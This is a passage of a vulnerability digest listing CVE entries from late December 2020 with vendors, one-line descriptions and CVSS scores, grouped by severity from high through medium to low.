2020-12-23 | CVE-2020-35587 | Mersive | Unspecified vulnerability in Mersive Solstice Firmware In Solstice Pod before 3.0.3, the firmware can easily be decompiled/disassembled. | 7.5 |
2020-12-23 | CVE-2020-29550 | Urve | Cleartext Storage of Sensitive Information vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 7.5 |
2020-12-23 | CVE-2020-35586 | Mersive | Improper Restriction of Excessive Authentication Attempts vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.3.0 (or Open4.3), the Administrator password can be enumerated using brute-force attacks via the /Config/service/initModel?password= Solstice Open Control API because there is no complexity requirement (e.g., it might be all digits or all lowercase letters). | 7.5 |
2020-12-23 | CVE-2020-35585 | Mersive | Improper Restriction of Excessive Authentication Attempts vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.3.0 (or Open4.3), the screen key can be enumerated using brute-force attacks via the /lookin/info Solstice Open Control API because there are only 1.7 million possibilities. | 7.5 |
2020-12-23 | CVE-2020-25153 | Moxa | Weak Password Requirements vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in web service for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower does not require users to have strong passwords. | 7.5 |
2020-12-22 | CVE-2020-24580 | Dlink | Missing Authentication for Critical Function vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 7.5 |
2020-12-21 | CVE-2020-35623 | Mediawiki | Use of Incorrectly-Resolved Name or Reference vulnerability in Mediawiki An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. | 7.5 |
2020-12-21 | CVE-2020-29596 | Miniweb Http Server Project | Classic Buffer Overflow vulnerability in Miniweb Http Server Project Miniweb Http Server 0.8.19 MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request. | 7.5 |
2020-12-21 | CVE-2020-26281 | Rust Lang | Unspecified vulnerability in Rust-Lang Async-H1 async-h1 is an asynchronous HTTP/1.1 parser for Rust (crates.io). | 7.5 |
2020-12-21 | CVE-2018-7580 | Philips | Resource Exhaustion vulnerability in Philips HUE Firmware Philips Hue is vulnerable to a Denial of Service attack. | 7.5 |
2020-12-21 | CVE-2020-6882 | ZTE | Use of Hard-coded Credentials vulnerability in ZTE products ZTE E8810/E8820/E8822 series routers have an information leak vulnerability, which is caused by hard-coded MQTT service access credentials on the device. | 7.5 |
2020-12-21 | CVE-2020-6881 | ZTE | Origin Validation Error vulnerability in ZTE products ZTE E8810/E8820/E8822 series routers have an MQTT DoS vulnerability, which is caused by the failure of the device to verify the validity of abnormal messages. | 7.5 |
2020-12-21 | CVE-2020-5808 | Tenable | Unspecified vulnerability in Tenable Tenable.Sc In certain scenarios in Tenable.sc prior to 5.17.0, a scanner could potentially be used outside the user's defined scan zone without a particular zone being specified within the Automatic Distribution configuration. | 7.5 |
2020-12-21 | CVE-2020-4870 | IBM | Unspecified vulnerability in IBM MQ 9.2.0 IBM MQ 9.2 CD and LTS are vulnerable to a denial of service attack caused by an error processing connecting applications. | 7.5 |
2020-12-21 | CVE-2020-27254 | Emerson | Improper Authentication vulnerability in Emerson products Emerson Rosemount X-STREAM Gas AnalyzerX-STREAM enhanced XEGP, XEGK, XEFD, XEXF – all revisions, The affected products are vulnerable to improper authentication for accessing log and backup data, which could allow an attacker with a specially crafted URL to obtain access to sensitive information. | 7.5 |
2020-12-21 | CVE-2020-26263 | Tlslite NG Project | Unspecified vulnerability in Tlslite-Ng Project Tlslite-Ng tlslite-ng is an open source python library that implements SSL and TLS cryptographic protocols. | 7.5 |
2020-12-23 | CVE-2020-11718 | Bilanc | Cleartext Transmission of Sensitive Information vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and below. | 7.4 |
2020-12-24 | CVE-2020-28186 | Terra Master | Weak Password Recovery Mechanism for Forgotten Password vulnerability in Terra-Master TOS Email Injection in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to abuse the forget password functionality and achieve account takeover. | 7.3 |
2020-12-22 | CVE-2020-27337 | Treck | Out-of-bounds Write vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 7.3 |
2020-12-27 | CVE-2020-29299 | Zyxel | Command Injection vulnerability in Zyxel products Certain Zyxel products allow command injection by an admin via an input string to chg_exp_pwd during a password-change action. | 7.2 |
2020-12-25 | CVE-2020-35708 | Phplist | SQL Injection vulnerability in PHPlist 3.5.9 phpList 3.5.9 allows SQL injection by admins who provide a crafted fourth line of a file to the "Config - Import Administrators" page. | 7.2 |
2020-12-24 | CVE-2020-2499 | Qnap | Use of Hard-coded Credentials vulnerability in Qnap QES A hard-coded password vulnerability has been reported to affect earlier versions of QES. | 7.2 |
2020-12-23 | CVE-2020-35136 | Dolibarr | Argument Injection or Modification vulnerability in Dolibarr Erp/Crm 12.0.3 Dolibarr 12.0.3 is vulnerable to authenticated Remote Code Execution. | 7.2 |
2020-12-23 | CVE-2020-35657 | Jaws Project | Unrestricted Upload of File with Dangerous Type vulnerability in Jaws Project Jaws 1.8.0 Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of UploadTheme to upload a theme ZIP archive containing a .php file that is able to execute OS commands. | 7.2 |
2020-12-23 | CVE-2020-35656 | Jaws Project | Unrestricted Upload of File with Dangerous Type vulnerability in Jaws Project Jaws 1.8.0 Jaws through 1.8.0 allows remote authenticated administrators to execute arbitrary code via crafted use of admin.php?reqGadget=Components&reqAction=InstallGadget&comp=FileBrowser and admin.php?reqGadget=FileBrowser&reqAction=Files to upload a .php file. | 7.2 |
2020-12-22 | CVE-2020-28641 | Malwarebytes | Link Following vulnerability in Malwarebytes Endpoint Protection and Malwarebytes In Malwarebytes Free 4.1.0.56, a symbolic link may be used delete an arbitrary file on the system by exploiting the local quarantine system. | 7.1 |
2020-12-22 | CVE-2020-27338 | Treck | Out-of-bounds Read vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 7.1 |
2020-12-24 | CVE-2020-28912 | Mariadb | Unspecified vulnerability in Mariadb With MariaDB running on Windows, when local clients connect to the server over named pipes, it's possible for an unprivileged user with an ability to run code on the server machine to intercept the named pipe connection and act as a man-in-the-middle, gaining access to all the data passed between the client and the server, and getting the ability to run SQL commands on behalf of the connected user. | 7.0 |
2020-12-24 | CVE-2020-28169 | TD Agent Builder Project Debian | Incorrect Permission Assignment for Critical Resource vulnerability in multiple products The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM. | 7.0 |
2020-12-22 | CVE-2020-24680 | ABB | Insufficiently Protected Credentials vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, the passwords of internal users (not Windows Users) are encrypted but improperly stored in a database. | 7.0 |
87 Medium Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-24 | CVE-2020-9137 | Huawei | Improper Input Validation vulnerability in Huawei products There is a privilege escalation vulnerability in some versions of CloudEngine 12800,CloudEngine 5800,CloudEngine 6800 and CloudEngine 7800. | 6.7 |
2020-12-21 | CVE-2020-25860 | Pengutronix | Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Pengutronix Rauc The install.c module in the Pengutronix RAUC update client prior to version 1.5 has a Time-of-Check Time-of-Use vulnerability, where signature verification on an update file takes place before the file is reopened for installation. | 6.6 |
2020-12-26 | CVE-2020-35347 | Cxuu | Cross-Site Request Forgery (CSRF) vulnerability in Cxuu Cxuucms 3.1 CXUUCMS V3 3.1 has a CSRF vulnerability that can add an administrator account via admin.php?c=adminuser&a=add. | 6.5 |
2020-12-26 | CVE-2020-20412 | Xiph ORG Stepmania | Improper Validation of Array Index vulnerability in multiple products lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file. | 6.5 |
2020-12-24 | CVE-2020-9201 | Huawei | Out-of-bounds Read vulnerability in Huawei products There is an out-of-bounds read vulnerability in some versions of NIP6800, Secospace USG6600 and USG9500. | 6.5 |
2020-12-24 | CVE-2020-27722 | F5 | Resource Exhaustion vulnerability in F5 Big-Ip Access Policy Manager In BIG-IP APM versions 15.0.0-15.0.1.3, 14.1.0-14.1.3, and 13.1.0-13.1.3.4, under certain conditions, the VDI plugin does not observe plugin flow-control protocol causing excessive resource consumption. | 6.5 |
2020-12-24 | CVE-2020-27724 | F5 | Resource Exhaustion vulnerability in F5 Big-Ip Access Policy Manager In BIG-IP APM versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.4, 15.0.0-15.0.1.3, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, on systems running more than one TMM instance, authenticated VPN users may consume excessive resources by sending specially-crafted malicious traffic over the tunnel. | 6.5 |
2020-12-22 | CVE-2020-24578 | Dlink | Incorrect Permission Assignment for Critical Resource vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 6.5 |
2020-12-22 | CVE-2019-11784 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in mail module (notifications) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to obtain access to arbitrary messages in conversations they were not a party to. | 6.5 |
2020-12-22 | CVE-2019-11783 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in mail module (channel partners) in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users to subscribe to arbitrary mail channels uninvited. | 6.5 |
2020-12-22 | CVE-2019-11782 | Odoo | Unspecified vulnerability in Odoo Improper access control in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote authenticated users with access to contact management to modify user accounts, leading to privilege escalation. | 6.5 |
2020-12-22 | CVE-2018-15645 | Odoo | Incorrect Permission Assignment for Critical Resource vulnerability in Odoo Improper access control in message routing in Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier allows remote authenticated users to create arbitrary records via crafted payloads, which may allow privilege escalation. | 6.5 |
2020-12-21 | CVE-2020-14225 | Hcltechsw Hcltech | HCL iNotes is susceptible to a Tabnabbing vulnerability caused by improper sanitization of message content. | 6.5 |
2020-12-21 | CVE-2020-35497 | Ovirt Redhat | A flaw was found in ovirt-engine 4.4.3 and earlier allowing an authenticated user to read other users' personal information, including name, email and public SSH key. | 6.5 |
2020-12-21 | CVE-2020-3999 | Vmware | Improper Input Validation vulnerability in VMWare Esxi, Fusion and Workstation VMware ESXi (7.0 prior to ESXi70U1c-17325551), VMware Workstation (16.x prior to 16.0 and 15.x prior to 15.5.7), VMware Fusion (12.x prior to 12.0 and 11.x prior to 11.5.7) and VMware Cloud Foundation contain a denial of service vulnerability due to improper input validation in GuestInfo. | 6.5 |
2020-12-21 | CVE-2019-16959 | Solarwinds | Improper Neutralization of Formula Elements in a CSV File vulnerability in Solarwinds Webhelpdesk 12.7.0 SolarWinds Web Help Desk 12.7.0 allows CSV Injection, also known as Formula Injection, via a file attached to a ticket. | 6.5 |
2020-12-21 | CVE-2020-4757 | IBM | Cross-site Scripting vulnerability in IBM Content Navigator 3.0.0 IBM FileNet Content Manager and IBM Content Navigator 3.0.CD is vulnerable to stored cross-site scripting. | 6.4 |
2020-12-24 | CVE-2020-9119 | Huawei | Unspecified vulnerability in Huawei products There is a privilege escalation vulnerability on some Huawei smart phones due to design defects. | 6.2 |
2020-12-27 | CVE-2020-29250 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.0 CXUUCMS V3 allows XSS via the first and third input fields to /public/admin.php. | 6.1 |
2020-12-27 | CVE-2020-29249 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.0 CXUUCMS V3 allows class="layui-input" XSS. | 6.1 |
2020-12-27 | CVE-2020-29204 | Xuxueli | Cross-site Scripting vulnerability in Xuxueli Xxl-Job 2.2.0 XXL-JOB 2.2.0 allows Stored XSS (in Add User) to bypass the 20-character limit via xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java. | 6.1 |
2020-12-27 | CVE-2020-35678 | Crossbar | Open Redirect vulnerability in Crossbar Autobahn Autobahn|Python before 20.12.3 allows redirect header injection. | 6.1 |
2020-12-26 | CVE-2020-35437 | Intelliants | Cross-site Scripting vulnerability in Intelliants Subrion CMS 4.2.1 Subrion CMS 4.2.1 is affected by: Cross Site Scripting (XSS) through the avatar[path] parameter in a POST request to the /_core/profile/ URI. | 6.1 |
2020-12-26 | CVE-2020-29172 | Litespeedtech | Cross-site Scripting vulnerability in Litespeedtech Litespeed Cache A cross-site scripting (XSS) vulnerability in the LiteSpeed Cache plugin before 3.6.1 for WordPress can be exploited via the Server IP setting. | 6.1 |
2020-12-26 | CVE-2020-27515 | Techkshetrainfo | Cross-site Scripting vulnerability in Techkshetrainfo Savsoft Quiz 5.0 A Cross Site Scripting (XSS) vulnerability in Savsoft Quiz v5.0 allows remote attackers to inject arbitrary web script or HTML via the Skype ID field. | 6.1 |
2020-12-24 | CVE-2020-35659 | PI Hole | Cross-site Scripting vulnerability in Pi-Hole The DNS query log in Pi-hole before 5.2.2 is vulnerable to stored XSS. | 6.1 |
2020-12-24 | CVE-2020-27729 | F5 | Open Redirect vulnerability in F5 Big-Ip Access Policy Manager In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, an undisclosed link on the BIG-IP APM virtual server allows a malicious user to build an open redirect URI. | 6.1 |
2020-12-24 | CVE-2020-27726 | F5 | Cross-site Scripting vulnerability in F5 Big-Ip Access Policy Manager In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.2, a reflected cross-site scripting (XSS) vulnerability exists in the resource information page for authenticated users when a full webtop is configured on the BIG-IP APM system. | 6.1 |
2020-12-24 | CVE-2020-27719 | F5 | Cross-site Scripting vulnerability in F5 products On BIG-IP 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.3, a cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. | 6.1 |
2020-12-24 | CVE-2020-35676 | Bigprof | Cross-site Scripting vulnerability in Bigprof Online Invoicing System BigProf Online Invoicing System before 3.1 fails to correctly sanitize an XSS payload when a user registers using the self-registration functionality. | 6.1 |
2020-12-24 | CVE-2020-35669 | Dart | Injection vulnerability in Dart Http An issue was discovered in the http package through 0.12.2 for Dart. | 6.1 |
2020-12-23 | CVE-2020-35252 | Egavilanmedia | Cross-site Scripting vulnerability in Egavilanmedia User Registration and Login System With Admin Panel 1.0 Cross Site Scripting (XSS) vulnerability via the 'Full Name' parameter in the User Registration section of User Registration & Login System with Admin Panel 1.0. | 6.1 |
2020-12-23 | CVE-2020-13969 | CRK | Cross-site Scripting vulnerability in CRK Business Platform 2019.1 CRK Business Platform <= 2019.1 allows reflected XSS via erro.aspx on 'CRK', 'IDContratante', 'Erro', or 'Mod' parameter. | 6.1 |
2020-12-23 | CVE-2020-9439 | Uncannyowl | Cross-site Scripting vulnerability in Uncannyowl TIN Canny Reporting for Learndash Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Owl Tin Canny LearnDash Reporting before 3.4.4 allows authenticated remote attackers to inject arbitrary web script or HTML via the search_key GET Parameter in TinCan_Content_List_Table.php, message GET Parameter in licensing.php, tc_filter_group parameter in reporting-admin-menu.php, tc_filter_user parameter in reporting-admin-menu.php, tc_filter_course parameter in reporting-admin-menu.php, tc_filter_lesson parameter in reporting-admin-menu.php, tc_filter_module parameter in reporting-admin-menu.php, tc_filter_action parameter in reporting-admin-menu.php, tc_filter_data_range parameter in reporting-admin-menu.php, or tc_filter_data_range_last parameter in reporting-admin-menu.php. | 6.1 |
2020-12-23 | CVE-2020-6159 | Opera | Cross-site Scripting vulnerability in Opera 52.1.2517.139570/54.0.2669.49432 URLs using “javascript:” have the protocol removed when pasted into the address bar to protect users from cross-site scripting (XSS) attacks, but in certain circumstances this removal was not performed. | 6.1 |
2020-12-23 | CVE-2020-35650 | Uncannyowl | Cross-site Scripting vulnerability in Uncannyowl Uncanny Groups for Learndash Multiple cross-site scripting (XSS) vulnerabilities in Uncanny Groups for LearnDash before v3.7 allow authenticated remote attackers to inject arbitrary JavaScript or HTML via the ulgm_code_redeem POST Parameter in user-code-redemption.php, the ulgm_user_first POST Parameter in user-registration-form.php, the ulgm_user_last POST Parameter in user-registration-form.php, the ulgm_user_email POST Parameter in user-registration-form.php, the ulgm_code_registration POST Parameter in user-registration-form.php, the ulgm_terms_conditions POST Parameter in user-registration-form.php, the _ulgm_total_seats POST Parameter in frontend-uo_groups_buy_courses.php, the uncanny_group_signup_user_first POST Parameter in group-registration-form.php, the uncanny_group_signup_user_last POST Parameter in group-registration-form.php, the uncanny_group_signup_user_login POST Parameter in group-registration-form.php, the uncanny_group_signup_user_email POST Parameter in group-registration-form.php, the success-invited GET Parameter in frontend-uo_groups.php, the bulk-errors GET Parameter in frontend-uo_groups.php, or the message GET Parameter in frontend-uo_groups.php. | 6.1 |
2020-12-22 | CVE-2018-15634 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in attachment management in Odoo Community 14.0 and earlier and Odoo Enterprise 14.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via a crafted link. | 6.1 |
2020-12-22 | CVE-2018-15633 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in "document" module in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via crafted attachment filenames. | 6.1 |
2020-12-21 | CVE-2020-35622 | Mediawiki | Cross-site Scripting vulnerability in Mediawiki An issue was discovered in the GlobalUsage extension for MediaWiki through 1.35.1. | 6.1 |
2020-12-21 | CVE-2020-26277 | Dbdeployer | Unspecified vulnerability in Dbdeployer DBdeployer is a tool that deploys MySQL database servers easily. | 6.1 |
2020-12-21 | CVE-2020-4840 | IBM | Open Redirect vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. | 6.1 |
2020-12-21 | CVE-2020-26275 | Jupyter | Unspecified vulnerability in Jupyter Server The Jupyter Server provides the backend (i.e. | 6.1 |
2020-12-21 | CVE-2020-26049 | Niftypm | Cross-site Scripting vulnerability in Niftypm Nifty-Pm Cpe2.3 Nifty-PM CPE 2.3 is affected by stored HTML injection. | 6.1 |
2020-12-24 | CVE-2020-28190 | Terra Master | Unspecified vulnerability in Terra-Master TOS TerraMaster TOS <= 4.2.06 was found to check for updates (of both system and applications) via an insecure channel (HTTP). | 5.9 |
2020-12-23 | CVE-2020-35584 | Mersive | Cleartext Transmission of Sensitive Information vulnerability in Mersive Solstice POD Firmware In Solstice Pod before 3.0.3, the web services allow users to connect to them over unencrypted channels via the Browser Look-in feature. | 5.9 |
2020-12-21 | CVE-2020-4841 | IBM | Missing Authorization vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. | 5.9 |
2020-12-26 | CVE-2020-28759 | Tengine Project | Classic Buffer Overflow vulnerability in Tengine Project Tengine 1.0 The serializer module in OAID Tengine lite-v1.0 has a Buffer Overflow and crash. | 5.5 |
2020-12-26 | CVE-2020-29385 | Gnome Canonical Fedoraproject | Infinite Loop vulnerability in multiple products GNOME gdk-pixbuf (aka GdkPixbuf) before 2.42.2 allows a denial of service (infinite loop) in lzw.c in the function write_indexes. | 5.5 |
2020-12-23 | CVE-2020-4642 | IBM | Unspecified vulnerability in IBM DB2 IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow local attacker to cause a denial of service inside the "DB2 Management Service". | 5.5 |
2020-12-22 | CVE-2020-35609 | Microsoft | Infinite Loop vulnerability in Microsoft Azure Sphere 20.05 A denial-of-service vulnerability exists in the asynchronous ioctl functionality of Microsoft Azure Sphere 20.05. | 5.5 |
2020-12-25 | CVE-2020-35707 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Company Name parameter to the New Client screen. | 5.4 |
2020-12-25 | CVE-2020-35706 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Project screen. | 5.4 |
2020-12-25 | CVE-2020-35705 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Name parameter to the New User screen. | 5.4 |
2020-12-25 | CVE-2020-35704 | Daybydaycrm | Cross-site Scripting vulnerability in Daybydaycrm Daybyday 2.1.0 Daybyday 2.1.0 allows stored XSS via the Title parameter to the New Lead screen. | 5.4 |
2020-12-24 | CVE-2020-28184 | Terra Master | Cross-site Scripting vulnerability in Terra-Master TOS Cross-site scripting (XSS) vulnerability in TerraMaster TOS <= 4.2.06 allows remote authenticated users to inject arbitrary web script or HTML via the mod parameter to /module/index.php. | 5.4 |
2020-12-24 | CVE-2020-2503 | Qnap | Cross-site Scripting vulnerability in Qnap QES If exploited, this stored cross-site scripting vulnerability could allow remote attackers to inject malicious code in File Station. | 5.4 |
2020-12-22 | CVE-2018-15641 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in web module in Odoo Community 11.0 through 14.0 and Odoo Enterprise 11.0 through 14.0, allows remote authenticated internal users to inject arbitrary web script in the browser of a victim via crafted calendar event attributes. | 5.4 |
2020-12-22 | CVE-2018-15638 | Odoo | Cross-site Scripting vulnerability in Odoo Cross-site scripting (XSS) issue in mail module in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim via crafted channel names. | 5.4 |
2020-12-21 | CVE-2020-4794 | IBM | Incorrect Authorization vulnerability in IBM products IBM Automation Workstream Services 19.0.3, 20.0.1, 20.0.2, IBM Business Automation Workflow 18.0, 19.0, and 20.0 and IBM Business Process Manager 8.6 could allow an authenticated user to obtain sensitive information or cuase a denial of service due to iimproper authorization checking. | 5.4 |
2020-12-21 | CVE-2020-4555 | IBM | Session Fixation vulnerability in IBM Financial Transaction Manager IBM Financial Transaction Manager 3.0.6 and 3.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. | 5.4 |
2020-12-21 | CVE-2020-35275 | Coastercms | Cross-site Scripting vulnerability in Coastercms 5.8.18 Coastercms v5.8.18 is affected by cross-site Scripting (XSS). | 5.4 |
2020-12-21 | CVE-2020-35589 | Limitloginattempts | Cross-site Scripting vulnerability in Limitloginattempts Limit Login Attempts Reloaded The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&tab= XSS. | 5.4 |
2020-12-27 | CVE-2020-29156 | Woocommerce | Authorization Bypass Through User-Controlled Key vulnerability in Woocommerce The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action. | 5.3 |
2020-12-25 | CVE-2020-35710 | Parallels | Information Exposure vulnerability in Parallels Remote Application Server 18.0 Parallels Remote Application Server (RAS) 18 allows remote attackers to discover an intranet IP address because submission of the login form (even with blank credentials) provides this address to the attacker's client for use as a "host" value. | 5.3 |
2020-12-24 | CVE-2020-28185 | Terra Master | Unspecified vulnerability in Terra-Master TOS User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. | 5.3 |
2020-12-23 | CVE-2020-25192 | Moxa | Information Exposure vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower allows sensitive information to be displayed without proper authorization. | 5.3 |
2020-12-23 | CVE-2020-35658 | Titanhq | Cleartext Storage of Sensitive Information vulnerability in Titanhq Spamtitan SpamTitan before 7.09 allows attackers to tamper with backups, because backups are not encrypted. | 5.3 |
2020-12-22 | CVE-2020-27336 | Treck | Out-of-bounds Read vulnerability in Treck Ipv6 An issue was discovered in Treck IPv6 before 6.0.1.68. | 5.3 |
2020-12-22 | CVE-2020-14270 | Hcltech | Improper Handling of Exceptional Conditions vulnerability in Hcltech Domino HCL Domino v9, v10, v11 is susceptible to an Information Disclosure vulnerability in XPages due to improper error handling of user input. | 5.3 |
2020-12-21 | CVE-2020-35624 | Mediawiki | Information Exposure Through Discrepancy vulnerability in Mediawiki An issue was discovered in the SecurePoll extension for MediaWiki through 1.35.1. | 5.3 |
2020-12-21 | CVE-2020-26422 | Wireshark Oracle | Classic Buffer Overflow vulnerability in multiple products Buffer overflow in QUIC dissector in Wireshark 3.4.0 to 3.4.1 allows denial of service via packet injection or crafted capture file | 5.3 |
2020-12-25 | CVE-2020-35709 | Bloofox | Path Traversal vulnerability in Bloofox Bloofoxcms 0.5.2.1 bloofoxCMS 0.5.2.1 allows admins to upload arbitrary .php files (with "Content-Type: application/octet-stream") to ../media/images/ via the admin/index.php?mode=tools&page=upload URI, aka directory traversal. | 4.9 |
2020-12-24 | CVE-2020-27727 | F5 | Improper Input Validation vulnerability in F5 products On BIG-IP version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.4, when an authenticated administrative user installs RPMs using the iAppsLX REST installer, the BIG-IP system does not sufficiently validate user input, allowing the user read access to the filesystem. | 4.9 |
2020-12-21 | CVE-2020-4842 | IBM | Information Exposure Through an Error Message vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. | 4.9 |
2020-12-26 | CVE-2020-35349 | Techkshetrainfo | Cross-site Scripting vulnerability in Techkshetrainfo Savsoft Quiz 5.0 Savsoft Quiz 5 is affected by: Cross Site Scripting (XSS) via field_title (aka a title on the custom fields page). | 4.8 |
2020-12-26 | CVE-2020-35346 | Cxuu | Cross-site Scripting vulnerability in Cxuu Cxuucms 3.1 CXUUCMS V3 3.1 is affected by a reflected XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of admin.php?c=content&a=add. | 4.8 |
2020-12-24 | CVE-2020-29247 | Wondercms | Cross-site Scripting vulnerability in Wondercms 3.1.3 WonderCMS 3.1.3 is affected by cross-site scripting (XSS) in the Admin Panel. | 4.8 |
2020-12-24 | CVE-2020-35677 | Bigprof | Cross-site Scripting vulnerability in Bigprof Online Invoicing System BigProf Online Invoicing System before 4.0 fails to adequately sanitize fields for HTML characters upon an administrator using admin/pageEditGroup.php to create a new group, resulting in Stored XSS. | 4.8 |
2020-12-24 | CVE-2020-5684 | NEC | Improper Certificate Validation vulnerability in NEC ISM Server 5.1 iSM client versions from V5.1 prior to V12.1 running on NEC Storage Manager or NEC Storage Manager Express does not verify a server certificate properly, which allows a man-in-the-middle attacker to eavesdrop on an encrypted communication or alter the communication via a crafted certificate. | 4.8 |
2020-12-23 | CVE-2020-28071 | Alumni Management System Project | Cross-site Scripting vulnerability in Alumni Management System Project Alumni Management System 1.0 SourceCodester Alumni Management System 1.0 is affected by cross-site Scripting (XSS) in /admin/gallery.php. | 4.8 |
2020-12-21 | CVE-2020-35274 | Dotcms | Cross-site Scripting vulnerability in Dotcms 20.11 DotCMS Add Template with admin panel 20.11 is affected by cross-site Scripting (XSS) to gain remote privileges. | 4.8 |
2020-12-24 | CVE-2020-9202 | Huawei | Insecure Storage of Sensitive Information vulnerability in Huawei TE Mobile V600R006C10/V600R006C10Spc100 There is an information disclosure vulnerability in TE Mobile software versions V600R006C10,V600R006C10SPC100. | 4.4 |
2020-12-24 | CVE-2020-27725 | F5 | Memory Leak vulnerability in F5 products In version 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2 of BIG-IP DNS, GTM, and Link Controller, zxfrd leaks memory when listing DNS zones. | 4.3 |
2020-12-22 | CVE-2019-11786 | Odoo | Unspecified vulnerability in Odoo Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier, allows remote authenticated users to modify translated terms, which may lead to arbitrary content modification on translatable elements. | 4.3 |
2020-12-22 | CVE-2019-11785 | Odoo | Missing Authorization vulnerability in Odoo Improper access control in mail module (followers) in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier, allows remote authenticated users to obtain access to messages posted on business records there were not given access to, and subscribe to receive future messages. | 4.3 |
2020-12-21 | CVE-2020-4843 | IBM | Cleartext Storage of Sensitive Information vulnerability in IBM Security Secret Server 10.6 IBM Security Secret Server 10.6 stores potentially sensitive information in config files that could be read by an authenticated user. | 4.3 |
2020-12-21 | CVE-2020-29447 | Atlassian | Unrestricted Upload of File with Dangerous Type vulnerability in Atlassian Crucible Affected versions of Atlassian Crucible allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability in the file upload request feature of code reviews. | 4.3 |
2 Low Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-27 | CVE-2020-35448 | GNU Netapp | Out-of-bounds Read vulnerability in multiple products An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.35.1. | 3.3 |
